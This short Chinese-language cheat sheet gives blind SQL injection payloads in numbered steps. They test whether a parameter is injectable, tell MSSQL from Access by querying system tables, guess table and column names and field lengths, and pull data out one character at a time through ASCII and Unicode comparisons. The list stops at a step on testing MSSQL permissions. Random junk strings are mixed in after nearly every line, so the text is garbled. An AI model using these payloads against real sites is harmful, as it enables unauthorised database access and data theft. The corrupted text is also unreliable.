1.判断是否有注入;and 1=1 ;and 1=2 |A~jsz6pI
2.初步判断是否是mssql ;and user>0 ~W'{p
x+:UN'"r
3.注入参数是字符'and [查询条件] and ''=' mDABH@R
#G|RnV%t$~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' [b%D3-}'
9&2O9Nz6
5.判断数据库系统 X7MM2V
lv<*7BCp
;and (select count(*) from sysobjects)>0 mssql 0S_~ \t
dL 1tl
;and (select count(*) from msysobjects)>0 access P )"m0Lu<
2;`1h[,-^
b5I I/Y
/9*B)m"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 $9#H04.x
6<SAa#@ey
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 %lhEM}Sm
c|y(2K)o[=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 /{l$sBUL
,4e:I.b
9.(1)猜字段的ascii值(access) G6P?2@
H5B:;g@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 iC32nY?
ZY55|eE
(2)猜字段的ascii值(mssql) P6`u._mX
iN\4gQ!
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 zkrM/ @p#
hbDXo:
10.测试权限结构(mssql) {X+3;&